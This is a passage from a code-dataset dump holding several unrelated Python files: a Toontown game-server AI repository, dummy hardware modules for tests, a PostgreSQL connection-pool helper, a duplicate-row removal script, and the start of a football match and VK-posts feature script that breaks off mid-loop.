DistributedPolarPlaceEffectMgrAI\n\nfrom toontown.uberdog.BanManagerAI import BanManagerAI\nfrom toontown.uberdog.ShardAPIManagerAI import ShardAPIManagerAI\n\nclass ToontownAIRepository(ToontownInternalRepository):\n def __init__(self, baseChannel, serverId, districtName):\n ToontownInternalRepository.__init__(self, baseChannel, serverId, dcSuffix='AI')\n\n self.districtName = districtName\n\n self.zoneAllocator = UniqueIdAllocator(ToontownGlobals.DynamicZonesBegin,\n ToontownGlobals.DynamicZonesEnd)\n\n NPCToons.generateZone2NpcDict()\n self.hoods = []\n self._dnaStoreMap = {}\n \n self.zoneDataStore = AIZoneDataStore()\n\n self.useAllMinigames = self.config.GetBool('want-all-minigames', False)\n self.doLiveUpdates = True\n \n self.wantCogdominiums = self.config.GetBool('want-cogdo', False)\n self.wantParties = self.config.GetBool('want-parties', True)\n self.wantEmblems = self.config.GetBool('want-emblems', True)\n \n self.questManager = QuestManagerAI(self)\n self.promotionMgr = PromotionManagerAI(self)\n self.cogPageManager = CogPageManagerAI(self)\n self.cogSuitMgr = CogSuitManagerAI(self)\n\n self.trophyMgr = DistributedTrophyMgrAI(self)\n \n self.fishManager = FishManagerAI()\n\t\t\n self.dnaStoreMap = {}\n \n self.mintMgr = MintManagerAI.MintManagerAI(self)\n 
self.factoryMgr = FactoryManagerAI.FactoryManagerAI(self)\n self.lawMgr = LawOfficeManagerAI.LawOfficeManagerAI(self)\n self.countryClubMgr = CountryClubManagerAI.CountryClubManagerAI(self)\n \n self.buildingManagers = {}\n self.suitPlanners = {}\n \n self.wantMegaInvasions = str(self.ourChannel // 1000000) in self.config.GetString('mega-invasion-shards', '402 403').split()\n\n self.accept('GLOBAL_MSG_CLOSING_FOR_UPDATE_NOW', sys.exit, [1024])\n\n def getTrackClsends(self):\n return False\n \n def handleConnected(self):\n ToontownInternalRepository.handleConnected(self)\n self.districtId = self.allocateChannel()\n self.distributedDistrict = ToontownDistrictAI(self)\n self.distributedDistrict.setName(self.districtName)\n self.distributedDistrict.generateWithRequiredAndId(simbase.air.districtId, self.getGameDoId(), 2)\n\n dg = PyDatagram()\n dg.addServerHeader(simbase.air.districtId, simbase.air.ourChannel, STATESERVER_OBJECT_SET_AI)\n dg.addChannel(simbase.air.ourChannel)\n simbase.air.send(dg)\n\n self.createGlobals()\n self.createZones()\n\n def __ready(self):\n self.removeAtExit(self.districtStats.doId)\n\n self.apiMgr = ShardAPIManagerAI(self)\n self.apiMgr.d_setShardData()\n \n self.banMgr = BanManagerAI(self)\n \n self.trophyMgr.updateToonData()\n \n def gotUberdogAPISync(self):\n if not self.distributedDistrict.getAvailable():\n self.notify.info('Got UD API sync, opening shard...')\n messenger.send('startShardActivity')\n self.distributedDistrict.b_setAvailable(1)\n self.sendNetEvent('shardStarted')\n self.addExitEvent('shardDied')\n\n def incrementPopulation(self):\n self.districtStats.b_setAvatarCount(self.districtStats.getAvatarCount() + 1)\n\n def decrementPopulation(self):\n self.districtStats.b_setAvatarCount(self.districtStats.getAvatarCount() - 1)\n\n def allocateZone(self):\n return self.zoneAllocator.allocate()\n\n def deallocateZone(self, zone):\n self.zoneAllocator.free(zone)\n\n def getZoneDataStore(self):\n return self.zoneDataStore\n\n def getAvatarExitEvent(self, avId):\n return 'distObjDelete-%d' % avId\n\n def createGlobals(self):\n self.districtStats = ToontownDistrictStatsAI(self)\n self.districtStats.settoontownDistrictId(self.districtId)\n self.districtStats.generateWithRequiredAndId(self.allocateChannel(), self.getGameDoId(), 2)\n\t\t\n self.timeManager = TimeManagerAI(self)\n self.timeManager.generateWithRequired(2)\n\n self.newsManager = NewsManagerAI(self)\n self.newsManager.generateWithRequired(2)\n\n self.holidayManager = HolidayManagerAI(self)\n\n self.magicWordManager = MagicWordManagerAI(self)\n self.magicWordManager.generateWithRequired(2)\n\n self.safeZoneManager = SafeZoneManagerAI(self)\n self.safeZoneManager.generateWithRequired(2)\n\t\t\n self.petMgr = PetManagerAI(self)\n\n self.friendManager = FriendManagerAI(self)\n self.friendManager.generateWithRequired(2)\n\n self.partyManager = DistributedPartyManagerAI(self)\n self.partyManager.generateWithRequired(2)\n\t\t\n self.tutorialManager = TutorialManagerAI(self)\n self.tutorialManager.generateWithRequired(2)\n\t\t\n self.estateManager = EstateManagerAI(self)\n self.estateManager.generateWithRequired(2)\n \n self.suitInvasionManager = DistributedSuitInvasionManagerAI(self)\n self.suitInvasionManager.generateWithRequired(2)\n\n self.bankMgr = DistributedBankMgrAI(self)\n self.bankMgr.generateWithRequired(2)\n \n self.catalogManager = CatalogManagerAI(self)\n self.catalogManager.generateWithRequired(2)\n \n self.huntId = 0\n \n if 
self.holidayManager.isHolidayRunning(ToontownGlobals.TRICK_OR_TREAT):\n import DistributedTrickOrTreatTargetAI\n self.trickOrTreatMgr = DistributedTrickOrTreatTargetAI.DistributedTrickOrTreatTargetAI(self)\n self.trickOrTreatMgr.generateWithRequired(2)\n \n self.handleBlackCatMgr()\n self.handleBloodsuckerInvasion()\n self.handleSkelCogWeekInvasion()\n \n if config.GetBool('want-resistance-emote', True):\n self.resistanceMgr = DistributedResistanceEmoteMgrAI.DistributedResistanceEmoteMgrAI(self)\n self.resistanceMgr.generateWithRequired(9720)\n \n if config.GetBool('want-top-toons', True):\n self.topToonsMgr = self.generateGlobalObject(OTP_DO_ID_TOONTOWN_TOP_TOONS_MGR, 'DistributedTopToonsManager')\n \n else:\n self.topToonsMgr = None\n\n if config.GetBool('want-polar-effect', True):\n self.polarMgr = DistributedPolarPlaceEffectMgrAI.DistributedPolarPlaceEffectMgrAI(self)\n self.polarMgr.generateWithRequired(3821)\n \n def handleBlackCatMgr(self):\n today = datetime.datetime.now()\n start = datetime.datetime(today.year, 10, 31)\n end = datetime.datetime(today.year, 11, 3)\n \n def createBlackCatMgr(task=None):\n import DistributedBlackCatMgrAI\n self.blackCatMgr = DistributedBlackCatMgrAI.DistributedBlackCatMgrAI(self)\n self.blackCatMgr.generateWithRequired(2513)\n if not self.config.GetBool('force-black-cat-mgr', False):\n self.blackCatMgr.expire((end - today).total_seconds())\n return Task.done\n \n if start <= today < end or self.config.GetBool('force-black-cat-mgr', False):\n createBlackCatMgr(None)\n \n elif start >= today:\n taskMgr.doMethodLater((start - today).total_seconds(), createBlackCatMgr, 'air-createBlackCatMgr')\n \n def handleBloodsuckerInvasion(self):\n if not self.wantMegaInvasions:\n return\n \n today = datetime.datetime.now()\n start = datetime.datetime(today.year, 10, 31)\n end = datetime.datetime(today.year, 11, 3)\n \n if start <= today < end:\n self.startMegaInvasion(9, end=end)\n \n elif start > today:\n taskMgr.doMethodLater((start - today).total_seconds(), self.startMegaInvasion, 'air-mega-invasion-9', extraArgs=[9, False, end])\n \n def handleSkelCogWeekInvasion(self):\n if not self.wantMegaInvasions:\n return\n \n today = datetime.datetime.now()\n start = datetime.datetime(today.year, 11, 10)\n end = datetime.datetime(today.year, 11, 17)\n \n if start <= today < end:\n self.startMegaInvasion(-1, skel=True, end=end)\n \n elif start > today:\n taskMgr.doMethodLater((start - today).total_seconds(), self.startMegaInvasion, 'air-mega-invasion-skel', extraArgs=[-1, True, end])\n \n def startMegaInvasion(self, suitIndex, skel=False, end=None):\n if suitIndex >= 0:\n suitName = SuitDNA.suitHeadTypes[suitIndex]\n \n else:\n suitName = None\n \n if self.suitInvasionManager.hasInvading():\n if self.suitInvasionManager.isMega():\n return Task.done\n \n self.suitInvasionManager.abort()\n \n self.suitInvasionManager.startInvasion(suitName, skel, mega=True)\n if end:\n def doAbort(task):\n self.suitInvasionManager.abort()\n return task.done\n\n today = datetime.datetime.now()\n taskMgr.doMethodLater((end - today).total_seconds(), doAbort, 'air-abort-mega-invasion')\n \n def getStorage(self, zone):\n s = self._dnaStoreMap.get(zone)\n if not s:\n s = DNAStorage()\n self.loadDNAFileAI(s, self.genDNAFileName(zone))\n self._dnaStoreMap[zone] = s\n \n return s\n\n def createZones(self):\n self.zoneTable = {\n 1000: ((1000, 1, 0), (1100, 1, 1), (1200, 1, 1), (1300, 1, 1)),\n 2000: ((2000, 1, 0), (2100, 1, 1), (2200, 1, 1), (2300, 1, 1)),\n 3000: ((3000, 1, 0), (3100, 1, 1), (3200, 
1, 1), (3300, 1, 1)),\n 4000: ((4000, 1, 0), (4100, 1, 1), (4200, 1, 1), (4300, 1, 1)),\n 5000: ((5000, 1, 0), (5100, 1, 1), (5200, 1, 1), (5300, 1, 1)),\n 9000: ((9000, 1, 0), (9100, 1, 1), (9200, 1, 1)),\n \n 6000: (),\n 7000: ((7000, 1, 0), (7100, 1, 1)),\n 8000: ((8000, 1, 0),),\n 10000: (),\n 11000: (),\n 12000: (),\n 13000: (),\n 17000: (),\n }\n \n self.__nextHood(0)\n \n def __nextHood(self, hoodIndex):\n if hoodIndex >= len(hoods):\n self.__ready()\n return Task.done\n \n self.hoods.append(hoods[hoodIndex](self))\n taskMgr.doMethodLater(0, ToontownAIRepository.__nextHood, 'nextHood', [self, hoodIndex + 1])\n return Task.done\n\n def sendSetZone(self, obj, zoneId):\n obj.b_setLocation(obj.parentId, zoneId)\n \n def getDisconnectReason(self, avId):\n return self.timeManager.disconnectReasonMap.get(avId, 1) # Default: user closed window\n \n def killToon(self, avId, force = True):\n return\n\n\n '''\n Kills given toon if within this shard.\n If force is False, then checks getDisconnectReason.\n '''\n toon = self.doId2do.get(avId)\n \n if not toon:\n self.notify.warning('Tried to kill non-existing toon %s' % avId)\n return False\n \n if not force:\n if self.getDisconnectReason(avId) == 3: # Python Error\n return False\n \n toon.b_setHp(0)\n \n inventory = toon.inventory\n inventory.zeroInv()\n toon.b_setInventory(inventory.makeNetString())\n \n self.notify.info('Killed toon %s, RIP!' % avId)\n return True\n \n def handleObjExit(self, di):\n doId = di.getUint32()\n\n if doId not in self.doId2do:\n self.notify.warning('Received AI exit for unknown object %d' % (doId))\n return\n\n do = self.doId2do[doId]\n do.sendDeleteEvent()\n self.removeDOFromTables(do)\n do.delete()\n\n@magicWord(types=[int, str], chains=[CHAIN_HEAD])\ndef closeserver(time, type='maintenance'):\n if type not in ('maintenance', 'update'):\n return 'Invalid type!'\n \n if time < 0 or time in (2, 3, 4):\n return 'Min time is 5 (or 0 to abort, 1 to get)'\n \n av = spellbook.getInvoker()\n av.air.sendNetEvent('GLOBAL_MSG_CLOSING_FOR_UPDATE', [time, type])\n \n def resp(status):\n if status:\n channel = av.GetPuppetConnectionChannel(av.doId)\n av.air.sendSysMsg(status, channel)\n \n av.air.acceptOnce('GLOBAL_MSG_CLOSING_FOR_UPDATE_RESP', resp)\n","sub_path":"game/toontown/ai/ToontownAIRepository.py","file_name":"ToontownAIRepository.py","file_ext":"py","file_size_in_byte":15717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375799801","text":"\"\"\"Import dummy modules if actual modules not installed. 
Sets dummy modules in sys so subsequent imports\nuse the dummies\"\"\"\n\nimport sys\nfrom typing import Set\nimport unittest.mock\n\nclass dummy_package:\n pass\n\nclass dummy_pytabor(dummy_package):\n @staticmethod\n def open_session(*args, **kwargs):\n return None\n\nclass dummy_pyvisa(dummy_package):\n class resources(dummy_package):\n class messagebased(dummy_package):\n class MessageBasedResource:\n def __init__(self, *args, **kwargs):\n self.logged_writes = []\n self.logged_asks = []\n self.answers = dict()\n self.default_answer = '0, bla'\n\n def write(self, *args, **kwargs):\n self.logged_writes.append((args, kwargs))\n\n def ask(self, *args, **kwargs):\n self.logged_asks.append((args, kwargs))\n ques = args[0].split(';')\n ques = [q.strip(' ?') for q in ques if q.strip().endswith('?')]\n answers = [self.answers[q] if q in self.answers else self.default_answer\n for q in ques]\n return ';'.join(answers)\n\n def query(self, *args, **kwargs):\n self.logged_asks.append((args, kwargs))\n ques = args[0].split(';')\n ques = [q.strip(' ?') for q in ques if q.strip().endswith('?')]\n answers = [self.answers[q] if q in self.answers else self.default_answer\n for q in ques]\n return ';'.join(answers)\n\n\ndummy_pyvisa.resources.MessageBasedResource = dummy_pyvisa.resources.messagebased.MessageBasedResource\n\n\nclass dummy_teawg(dummy_package):\n # WX2184 Properties\n _wx2184_properties = {\n 'model_name': 'WX2184', # the model name\n 'fw_ver': 0.0, # the firmware version\n 'serial_num': '0' * 9, # serial number\n 'num_parts': 2, # number of instrument parts\n 'chan_per_part': 2, # number of channels per part\n 'seg_quantum': 16, # segment-length quantum\n 'min_seg_len': 192, # minimal segment length\n 'max_arb_mem': 32E6, # maximal arbitrary-memory (points per channel)\n 'min_dac_val': 0, # minimal DAC value\n 'max_dac_val': 2 ** 14 - 1, # maximal DAC value\n 'max_num_segs': 32E+3, # maximal number of segments\n 'max_seq_len': 48 * 1024, # maximal sequencer-table length (# rows)\n 'min_seq_len': 3, # minimal sequencer-table length (# rows)\n 'max_num_seq': 1000, # maximal number of sequencer-table\n 'max_aseq_len': 48 * 1024 - 2, # maximal advanced-sequencer table length\n 'min_aseq_len': 3, # minimal advanced-sequencer table length\n 'min_sclk': 75e6, # minimal sampling-rate (samples/seconds)\n 'max_sclk': 2300e6, # maximal sampling-rate (samples/seconds)\n 'digital_support': False, # is digital-wave supported?\n }\n\n # WX1284 Definitions\n _wx1284_properties = {\n 'model_name': 'WX1284', # the model name\n 'fw_ver': 0.0, # the firmware version\n 'serial_num': '0' * 9, # serial number\n 'num_parts': 2, # number of instrument parts\n 'chan_per_part': 2, # number of channels per part\n 'seg_quantum': 16, # segment-length quantum\n 'min_seg_len': 192, # minimal segment length\n 'max_arb_mem': 32E6, # maximal arbitrary-memory (points per channel)\n 'min_dac_val': 0, # minimal DAC value\n 'max_dac_val': 2 ** 14 - 1, # maximal DAC value\n 'max_num_segs': 32E+3, # maximal number of segments\n 'max_seq_len': 48 * 1024, # maximal sequencer-table length (# rows)\n 'min_seq_len': 3, # minimal sequencer-table length (# rows)\n 'max_num_seq': 1000, # maximal number of sequencer-table\n 'max_aseq_len': 48 * 1024 - 2, # maximal advanced-sequencer table length\n 'min_aseq_len': 3, # minimal advanced-sequencer table length\n 'min_sclk': 75e6, # minimal sampling-rate (samples/seconds)\n 'max_sclk': 1250e6, # maximal sampling-rate (samples/seconds)\n 'digital_support': False, # is digital-wave supported?\n 
}\n\n    # WX2182C Definitions\n    _wx2182C_properties = {\n        'model_name': 'WX2182C', # the model name\n        'fw_ver': 0.0, # the firmware version\n        'serial_num': '0' * 9, # serial number\n        'num_parts': 2, # number of instrument parts\n        'chan_per_part': 1, # number of channels per part\n        'seg_quantum': 16, # segment-length quantum\n        'min_seg_len': 192, # minimal segment length\n        'max_arb_mem': 32E6, # maximal arbitrary-memory (points per channel)\n        'min_dac_val': 0, # minimal DAC value\n        'max_dac_val': 2 ** 14 - 1, # maximal DAC value\n        'max_num_segs': 32E+3, # maximal number of segments\n        'max_seq_len': 48 * 1024, # maximal sequencer-table length (# rows)\n        'min_seq_len': 3, # minimal sequencer-table length (# rows)\n        'max_num_seq': 1000, # maximal number of sequencer-table\n        'max_aseq_len': 1000, # maximal advanced-sequencer table length\n        'min_aseq_len': 3, # minimal advanced-sequencer table length\n        'min_sclk': 10e6, # minimal sampling-rate (samples/seconds)\n        'max_sclk': 2.3e9, # maximal sampling-rate (samples/seconds)\n        'digital_support': False, # is digital-wave supported?\n    }\n\n    # WX1282C Definitions\n    _wx1282C_properties = {\n        'model_name': 'WX1282C', # the model name\n        'fw_ver': 0.0, # the firmware version\n        'serial_num': '0' * 9, # serial number\n        'num_parts': 2, # number of instrument parts\n        'chan_per_part': 1, # number of channels per part\n        'seg_quantum': 16, # segment-length quantum\n        'min_seg_len': 192, # minimal segment length\n        'max_arb_mem': 32E6, # maximal arbitrary-memory (points per channel)\n        'min_dac_val': 0, # minimal DAC value\n        'max_dac_val': 2 ** 14 - 1, # maximal DAC value\n        'max_num_segs': 32E+3, # maximal number of segments\n        'max_seq_len': 48 * 1024, # maximal sequencer-table length (# rows)\n        'min_seq_len': 3, # minimal sequencer-table length (# rows)\n        'max_num_seq': 1000, # maximal number of sequencer-table\n        'max_aseq_len': 1000, # maximal advanced-sequencer table length\n        'min_aseq_len': 3, # minimal advanced-sequencer table length\n        'min_sclk': 10e6, # minimal sampling-rate (samples/seconds)\n        'max_sclk': 1.25e9, # maximal sampling-rate (samples/seconds)\n        'digital_support': False, # is digital-wave supported?\n    }\n\n    # dictionary of supported-models' properties\n    model_properties_dict = {\n        'WX2184': _wx2184_properties,\n        'WX2184C': _wx2184_properties,\n        'WX1284': _wx1284_properties,\n        'WX1284C': _wx1284_properties,\n        'WX2182C': _wx2182C_properties,\n        'WX1282C': _wx1282C_properties,\n    }\n    class TEWXAwg:\n        _make_combined_wave_calls = []\n\n        def __init__(self, *args, paranoia_level=1, model='WX2184C', **kwargs):\n            self.logged_commands = []\n            self.logged_queries = []\n            self._visa_inst = dummy_pyvisa.resources.MessageBasedResource()\n            self.paranoia_level = paranoia_level\n            self.dev_properties = dummy_teawg.model_properties_dict[model]\n\n            self._download_segment_lengths_calls = []\n            self._send_binary_data_calls = []\n            self._download_adv_seq_table_calls = []\n            self._download_sequencer_table_calls = []\n\n        @property\n        def is_simulator(self):\n            return False\n        @property\n        def visa_inst(self):\n            return self._visa_inst\n        def send_cmd(self, *args, **kwargs):\n            self.logged_commands.append((args, kwargs))\n        def send_query(self, *args, **kwargs):\n            return self._visa_inst.ask(*args, **kwargs)\n        def download_segment_lengths(self, seg_len_list, pref='dummy_pref', paranoia_level='dummy_paranoia'):\n            self._download_segment_lengths_calls.append((seg_len_list, pref, paranoia_level))\n        def send_binary_data(self, pref, bin_dat, paranoia_level='dummy_paranoia'):\n            
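# Dummy stub: record the call arguments so tests can inspect what would have been sent to the device.\n            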
self._send_binary_data_calls.append((pref, bin_dat, paranoia_level))\n def download_adv_seq_table(self, advanced_sequencer_table, pref=':ASEQ:DATA', paranoia_level=None):\n self._download_adv_seq_table_calls.append((advanced_sequencer_table, pref, paranoia_level))\n def download_sequencer_table(self, *args, **kwargs):\n self._download_sequencer_table_calls.append((args, kwargs))\n\n @staticmethod\n def make_combined_wave(wav1, wav2, dest_array, dest_array_offset=0, add_idle_pts=False, quantum=16):\n dummy_teawg.TEWXAwg._make_combined_wave_calls.append((wav1, wav2, dest_array, dest_array_offset, add_idle_pts, quantum))\n\nclass dummy_atsaverage(dummy_package):\n class atsaverage(dummy_package):\n pass\n class alazar(dummy_package):\n pass\n class core(dummy_package):\n class AlazarCard:\n model = 'DUMMY'\n minimum_record_size = 256\n def __init__(self):\n self._startAcquisition_calls = []\n self._applyConfiguration_calls = []\n def startAcquisition(self, x: int):\n self._startAcquisition_calls.append(x)\n def applyConfiguration(self, config):\n self._applyConfiguration_calls.append(config)\n class config(dummy_package):\n class CaptureClockConfig:\n def numeric_sample_rate(self, card):\n return 10**8\n class ScanlineConfiguration:\n def __init__(self):\n self._apply_calls = []\n def apply(self, card, print_debug_output):\n self._apply_calls.append((card, print_debug_output))\n aimedBufferSize = unittest.mock.PropertyMock(return_value=2**22)\n ScanlineConfiguration.captureClockConfiguration = CaptureClockConfig()\n class operations(dummy_package):\n class OperationDefinition:\n pass\n class masks(dummy_package):\n class Mask:\n pass\n class CrossBufferMask:\n pass\n\n\ndef import_package(name, package=None) -> Set[dummy_package]:\n if package is None:\n package_dict = dict(atsaverage=dummy_atsaverage,\n pyvisa=dummy_pyvisa,\n pytabor=dummy_pytabor,\n teawg=dummy_teawg)\n if name in package_dict:\n package = package_dict[name]\n else:\n raise KeyError('Unknown package', name)\n\n imported = set()\n sys.modules[name] = package\n imported.add(package)\n for attr in dir(package):\n if isinstance(getattr(package, attr), type) and issubclass(getattr(package, attr), dummy_package):\n imported |= import_package(name + '.' 
+ attr, getattr(package, attr))\n return imported\n\n\ndef replace_missing():\n failed_imports = set()\n try:\n import pytabor\n except ImportError:\n failed_imports |= import_package('pytabor', dummy_pytabor)\n\n try:\n import pyvisa\n except ImportError:\n failed_imports |= import_package('pyvisa', dummy_pyvisa)\n\n try:\n import teawg\n except ImportError:\n failed_imports |= import_package('teawg', dummy_teawg)\n\n try:\n import atsaverage\n import atsaverage.config\n except ImportError:\n failed_imports |= import_package('atsaverage', dummy_atsaverage)\n return failed_imports\n\n","sub_path":"tests/hardware/dummy_modules.py","file_name":"dummy_modules.py","file_ext":"py","file_size_in_byte":11726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"142254441","text":"# -*- coding: utf-8 -*-\n\"\"\"\nConnection module\n\n\"\"\"\nfrom __future__ import division, print_function, unicode_literals\n# from psycopg2.pool import SimpleConnectionPool\nfrom psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT\n\nimport psycopg2\nimport psycopg2.extras # load the psycopg extras module\nimport traceback\nimport os\nimport sqlalchemy\n\nfrom labtrans.utils import log\n\n\nclass Pool():\n \"\"\"\n Connection Pool\n\n \"\"\"\n _connection = {}\n _pool = None\n _cursor = None\n _settings = {}\n _debug = False\n\n @classmethod\n def debug(cls, debug_flag: bool=None):\n \"\"\"\n\n :param debug_flag:\n \"\"\"\n if debug_flag is None:\n return cls._debug\n cls._debug = debug_flag\n\n @staticmethod\n def connection(db_name: str='default') -> object:\n \"\"\"\n\n :param db_name:\n :return: psycopg2 connection\n \"\"\"\n return Pool._connection[db_name][os.getpid()]\n\n @staticmethod\n def commit(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n \"\"\"\n (Pool.connection(db_name)).commit()\n\n\n @staticmethod\n def rollback(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n \"\"\"\n (Pool.connection(db_name)).rollback()\n\n\n @staticmethod\n def prepare_dsn(settings_db: dict, db_name: str='default'):\n \"\"\"\n\n :param settings_db:\n :param db_name:\n :return:\n \"\"\"\n return (\n ('host=%(HOST)s dbname=%(NAME)s user=%(USER)s ' +\n 'password=%(PASSWORD)s') %\n settings_db[db_name]\n )\n\n @staticmethod\n def create_connection(dsn: str):\n \"\"\"\n\n :param dsn:\n :return:\n \"\"\"\n return psycopg2.connect(dsn=dsn)\n\n @staticmethod\n def connect(db_settings: dict=None, db_name='default'):\n \"\"\"\n Connects to a base conn: host=localhost dbname=db_name user=postgres\n\n :param _settings_db:\n\n \"\"\"\n Pool._settings[db_name] = db_settings\n\n _conn_string = (\n ('host=%(HOST)s dbname=%(NAME)s user=%(USER)s ' +\n 'password=%(PASSWORD)s') % db_settings\n )\n\n # Pool.conn_string = _conn_string\n if db_name not in Pool._connection:\n Pool._connection[db_name] = {}\n\n Pool._connection[db_name][os.getpid()] = psycopg2.connect(\n dsn=_conn_string,\n connection_factory=psycopg2.extras.NamedTupleConnection\n )\n\n @staticmethod\n def get_engine(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n :return:\n \"\"\"\n return sqlalchemy.create_engine(\n 'postgresql+psycopg2://',\n creator=lambda: Pool.connection(db_name)\n )\n\n @staticmethod\n def close(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n \"\"\"\n Pool.connection(db_name).close()\n\n @staticmethod\n def cursor(db_name: str='default'):\n # open database connect\n \"\"\"\n\n :param db_name:\n :return:\n \"\"\"\n cur = Pool.connection(db_name).cursor()\n dbconf = 
Pool._settings[db_name]\n \n if 'SCHEMA' in dbconf:\n Pool.execute(cur, 'SET search_path TO ' + dbconf['SCHEMA'])\n return cur\n \n @staticmethod\n def cursor_pool(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n :return:\n \"\"\"\n if Pool._cursor:\n return Pool._cursor\n \n Pool._cursor = Pool.connection(db_name).cursor()\n dbconf = Pool._settings[db_name]\n\n if 'SCHEMA' in dbconf:\n Pool.execute(\n Pool._cursor, \n 'SET search_path TO ' + dbconf['SCHEMA']\n )\n return Pool._cursor\n\n @staticmethod\n def create_database(database_settings: dict, database_name: str):\n \"\"\"\n\n\n :param database_settings:\n :param database_name:\n \"\"\"\n _conn_string = (\n ('host=%(HOST)s dbname=%(NAME)s user=%(USER)s ' +\n 'password=%(PASSWORD)s') % database_settings\n )\n\n conn = psycopg2.connect(dsn=_conn_string)\n conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n\n cur = conn.cursor()\n dbconf = Pool._settings[database_name]\n\n if 'SCHEMA' in dbconf:\n Pool.execute(cur, 'SET search_path TO ' + dbconf['SCHEMA'])\n return cur\n\n @staticmethod\n def execute(cursor, statement, arg=()):\n \"\"\"\n\n \"\"\"\n if Pool.debug():\n try:\n log.append(statement % arg)\n except:\n pass\n\n cursor.execute(statement, arg)\n","sub_path":"labtrans/db/conn.py","file_name":"conn.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415650686","text":"\"\"\"\nMore Preprocessing to make A non-singular (deleting duplicate emails)\n\"\"\"\nfrom scipy import linalg\nimport numpy as np\n\nprint(\"Loading y\")\ny = np.loadtxt('labels.csv')\nprint(\"Loading A\")\nA = np.loadtxt('DataMatrix.csv',delimiter=\",\",usecols=range(45849))\nprint(\"Phase 1\")\nrows,cols = np.shape(A)\ncounter = 0\nindeces = []\nfor i in range(rows):\n indeces.append(counter)\n counter +=1 \ndeletes = []\nprint(\"Phase 2\")\nfor i in range(rows):\n print(i)\n for j in indeces:\n if np.array_equiv(A[i,:],A[j,:]) and i != j:\n deletes.append(j)\n #A = np.delete(A,(j),axis=0)\n #y = np.delete(y, (j),axis = 0)\n indeces.pop(0)\nprint(deletes)\nprint(\"Phase 3\")\n\ndeletes = np.unique(deletes)[::-1]\nprint(deletes)\nfor index in deletes:\n print(index)\n A = np.delete(A,(index),axis=0)\n y = np.delete(y, (index),axis = 0)\n\nprint(\"starting to write\")\nwith open(\"ReducedData.csv\",'w') as d:\n for row in A:\n for datum in row:\n d.write(str(datum) + \",\")\n d.write('\\n')\nwith open(\"ReducedLabels.csv\",'w') as l:\n for datum in y:\n l.write(str(datum))\n l.write('\\n')\n\n\"\"\"\nprint(\"Starting the inverse... 
:/\")\nw_hat = A.T@linalg.inv(A@A.T)@y\n\n\n#for i in w_hat:\n #print(i)\nwith open(\"weights.csv\",'w') as w:\n for weight in w_hat:\n w.write(str(weight))\n w.write(\"\\n\")\n\n\"\"\"\n","sub_path":"Erase Duplicates.py","file_name":"Erase Duplicates.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"195729777","text":"from pymongo import MongoClient\nimport pandas as pd\nimport datetime\nimport time\nimport networkx as nx\nimport numpy as np\nfrom ast import literal_eval\n\n\nHOUR = 3600\nCLUBS_TRANSLIT = {'Анжи':'anji', 'Амкар': 'amkar', 'Арсенал':'arsenal', 'Волга': 'volga', 'Динамо': 'dinamo', 'Зенит': 'zenit',\n 'Краснодар': 'krasnodar', 'Крылья Советов': 'krylya', 'Кубань': 'kuban', 'Локомотив': 'loko',\n 'Мордовия': 'mordovia', 'Ростов': 'rostov', 'Рубин': 'rubin', 'Спартак': 'spartak', 'Терек': 'terek',\n 'Томь': 'tom', 'Торпедо': 'torpedo', 'Урал': 'ural', 'Уфа': 'ufa', 'ЦСКА': 'cska'}\n\n\ndef get_datetime_from_str(date_str, time_str):\n return datetime.datetime.strptime(date_str+time_str, '%d.%m.%Y%H:%M')\n\n\ndef get_unixtime_from_datetime(input_datetime):\n return int(time.mktime(input_datetime.timetuple()))\n\n\ndef main():\n client = MongoClient()\n games_db = client['rfpl_games']\n posts_db = client['rfpl_vk_posts']\n users_db = client['rfpl_vk_users']\n\n # get all games info dataframe\n df_list = []\n for collection_name in games_db.collection_names(include_system_collections=False):\n collection = games_db[collection_name]\n df_list.append(pd.DataFrame(list(collection.find())))\n games_df = pd.concat(df_list, ignore_index=True)\n\n features_df = pd.DataFrame()\n\n for games_counter in range(len(games_df)):\n # markup\n home_team_violations = literal_eval(games_df.get_value(games_counter, 'home_team_violations'))\n guest_team_violations = literal_eval(games_df.get_value(games_counter, 'guest_team_violations'))\n violations = home_team_violations + guest_team_violations\n violations = [int(x) for x in violations]\n\n if 112 in violations:\n features_df.set_value(games_counter, 'chanting', 1)\n else:\n features_df.set_value(games_counter, 'chanting', 0)\n\n if 113 in violations:\n features_df.set_value(games_counter, 'throwing', 1)\n else:\n features_df.set_value(games_counter, 'throwing', 0)\n\n if 114 in violations:\n features_df.set_value(games_counter, 'pyro', 1)\n else:\n features_df.set_value(games_counter, 'pyro', 0)\n\n if 115 in violations:\n features_df.set_value(games_counter, 'fight', 1)\n else:\n features_df.set_value(games_counter, 'fight', 0)\n\n if 116 in violations:\n features_df.set_value(games_counter, 'banner', 1)\n else:\n features_df.set_value(games_counter, 'banner', 0)\n\n if 117 in violations:\n features_df.set_value(games_counter, 'others', 1)\n else:\n features_df.set_value(games_counter, 'others', 0)\n\n home_team = games_df.get_value(games_counter, 'home_team')\n match_date = games_df.get_value(games_counter, 'date')\n match_time = games_df.get_value(games_counter, 'time')\n end_time = get_unixtime_from_datetime(get_datetime_from_str(match_date, match_time)) + HOUR*2\n\n posts_collection = posts_db[CLUBS_TRANSLIT[home_team] + '_' + match_date]\n\n # posts number\n posts_number = posts_collection.count({'date': {'$lt': end_time}})\n\n if posts_number > 30:\n\n posts_df = pd.DataFrame(list(posts_collection.find({'date': {'$lt': end_time}})))\n text_lengths = []\n likes_numbers = []\n reposts_numbers = []\n anger = []\n contempt = []\n disgust = []\n 
